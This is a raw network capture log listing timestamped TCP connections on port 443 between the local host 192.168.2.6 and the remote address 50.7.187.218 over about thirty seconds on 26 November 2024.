Nov 26, 2024 08:11:27.690432072 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.690521955 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.690622091 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.691214085 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.691232920 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.691245079 CET	49749	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.691251040 CET	443	49749	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.917001963 CET	49755	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.917058945 CET	443	49755	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.917160034 CET	49755	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.917294025 CET	49755	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:27.917354107 CET	443	49755	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:27.921094894 CET	49755	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:28.013684988 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:28.013808012 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:28.013916969 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:28.017663956 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:28.017703056 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.389709949 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.389803886 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:29.393482924 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:29.393497944 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.393837929 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.403398991 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:29.451328993 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.896450043 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.896632910 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.896711111 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:29.896831989 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:29.896878004 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:29.896933079 CET	49756	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:29.896950006 CET	443	49756	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:30.098814011 CET	49762	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:30.098886967 CET	443	49762	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:30.098952055 CET	49762	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:30.103437901 CET	49762	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:30.103502035 CET	443	49762	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:30.103554010 CET	49762	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:30.114718914 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:30.114768982 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:30.114837885 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:30.115389109 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:30.115403891 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:31.526273012 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:31.526426077 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:31.528182030 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:31.528192043 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:31.528484106 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:31.541974068 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:31.587327003 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.045440912 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.045519114 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.045567036 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.045830965 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.045840979 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.045878887 CET	49763	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.045882940 CET	443	49763	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.239624023 CET	49769	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.239653111 CET	443	49769	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.239725113 CET	49769	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.239836931 CET	49769	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.239906073 CET	443	49769	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.239968061 CET	49769	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.249804974 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.249826908 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:32.249916077 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.250243902 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:32.250255108 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:33.621586084 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:33.621699095 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:33.623260975 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:33.623277903 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:33.623536110 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:33.624824047 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:33.667335987 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.133697987 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.133898973 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.133985996 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.134154081 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.134185076 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.134201050 CET	49770	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.134211063 CET	443	49770	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.329956055 CET	49777	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.330040932 CET	443	49777	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.330143929 CET	49777	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.330259085 CET	49777	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.330319881 CET	443	49777	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.330394030 CET	49777	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.340029001 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.340079069 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:34.340167046 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.340492010 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:34.340507984 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:35.800858021 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:35.800977945 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:35.802387953 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:35.802405119 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:35.803102016 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:35.806432009 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:35.851344109 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.330410004 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.330501080 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.330562115 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.330811977 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.330831051 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.330847979 CET	49778	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.330853939 CET	443	49778	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.530088902 CET	49784	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.530158043 CET	443	49784	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.530236959 CET	49784	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.598793983 CET	49784	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.598901987 CET	443	49784	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.598973989 CET	49784	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.641798973 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.641858101 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:36.641943932 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.654284000 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:36.654300928 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.069744110 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.069883108 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.071285009 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.071304083 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.071557999 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.076244116 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.123328924 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.591011047 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.591097116 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.591198921 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.592922926 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.592950106 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.592966080 CET	49785	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.592971087 CET	443	49785	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.788311958 CET	49791	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.788362026 CET	443	49791	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.788431883 CET	49791	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.788546085 CET	49791	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.788604975 CET	443	49791	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.789172888 CET	49791	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.798299074 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.798360109 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:38.798469067 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.798876047 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:38.798894882 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.254286051 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.254348040 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:40.264378071 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:40.264394045 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.264674902 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.269134045 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:40.311342955 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.783268929 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.783371925 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.783492088 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:40.784079075 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:40.784101009 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:40.784111977 CET	49792	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:40.784118891 CET	443	49792	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:41.004559994 CET	49798	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:41.004606009 CET	443	49798	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:41.004704952 CET	49798	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:41.004834890 CET	49798	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:41.004874945 CET	443	49798	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:41.004933119 CET	49798	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:41.062514067 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:41.062555075 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:41.062705994 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:41.063050985 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:41.063066006 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.434036016 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.434120893 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:42.435445070 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:42.435455084 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.435698986 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.437211037 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:42.483336926 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.943022966 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.943101883 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.943223953 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:42.943552971 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:42.943578005 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:42.943592072 CET	49799	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:42.943597078 CET	443	49799	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:43.144001961 CET	49805	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:43.144031048 CET	443	49805	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:43.144143105 CET	49805	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:43.144299984 CET	49805	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:43.144340038 CET	443	49805	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:43.144534111 CET	49805	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:43.194109917 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:43.194143057 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:43.194258928 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:43.194725990 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:43.194739103 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:44.605700970 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:44.605823040 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:44.607161999 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:44.607178926 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:44.607469082 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:44.608696938 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:44.655325890 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.124634981 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.124805927 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.124855042 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.125091076 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.125099897 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.125111103 CET	49806	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.125116110 CET	443	49806	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.317651987 CET	49811	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.317688942 CET	443	49811	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.317796946 CET	49811	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.320115089 CET	49811	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.320169926 CET	443	49811	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.320225954 CET	49811	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.370232105 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.370269060 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:45.370353937 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.370682001 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:45.370697021 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:46.781013966 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:46.781096935 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:46.782664061 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:46.782677889 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:46.782907963 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:46.784174919 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:46.831332922 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.299832106 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.299890041 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.299952984 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.300214052 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.300236940 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.300250053 CET	49812	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.300257921 CET	443	49812	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.494951010 CET	49818	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.494983912 CET	443	49818	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.495112896 CET	49818	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.495229006 CET	49818	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.495294094 CET	443	49818	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.495362997 CET	49818	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.541575909 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.541594982 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:47.541682959 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.542040110 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:47.542051077 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:48.955349922 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:48.955452919 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:48.956839085 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:48.956847906 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:48.957087040 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:48.958359957 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:48.999334097 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.474991083 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.475048065 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.475270987 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.475327969 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.475339890 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.475363016 CET	49819	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.475368023 CET	443	49819	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.665347099 CET	49825	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.665406942 CET	443	49825	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.669193983 CET	49825	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.669461966 CET	49825	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.669517040 CET	443	49825	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.669625998 CET	49825	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.733227968 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.733258009 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:49.733338118 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.733798027 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:49.733809948 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.142812014 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.142930984 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.144547939 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.144560099 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.144798994 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.146015882 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.187342882 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.668534994 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.668622971 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.668682098 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.668942928 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.668966055 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.668977976 CET	49826	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.668983936 CET	443	49826	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.854691029 CET	49832	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.854721069 CET	443	49832	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.854794025 CET	49832	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.854937077 CET	49832	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.854974031 CET	443	49832	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.855021954 CET	49832	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.863651037 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.863706112 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:51.863774061 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.864089012 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:51.864104033 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.230618954 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.230696917 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.232153893 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.232166052 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.232492924 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.233771086 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.275327921 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.739707947 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.739789009 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.739876032 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.740133047 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.740166903 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.740183115 CET	49833	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.740191936 CET	443	49833	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.930104017 CET	49838	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.930131912 CET	443	49838	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.930206060 CET	49838	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.930313110 CET	49838	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.930346966 CET	443	49838	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.931066990 CET	49838	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.970705986 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.970735073 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:53.970813036 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.971122026 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:53.971133947 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.382431984 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.382503033 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:55.384082079 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:55.384092093 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.384327888 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.385679960 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:55.431333065 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.901572943 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.901626110 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.901776075 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:55.901957035 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:55.901979923 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:55.901995897 CET	49839	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:55.902003050 CET	443	49839	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:56.088174105 CET	49844	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:56.088236094 CET	443	49844	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:56.088406086 CET	49844	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:56.088809967 CET	49844	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:56.088879108 CET	443	49844	50.7.187.218	192.168.2.6
Nov 26, 2024 08:11:56.088943958 CET	49844	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:56.105504990 CET	49845	443	192.168.2.6	50.7.187.218
Nov 26, 2024 08:11:56.105544090 CET	443	49845	50.7.187.218	192.168.2.6
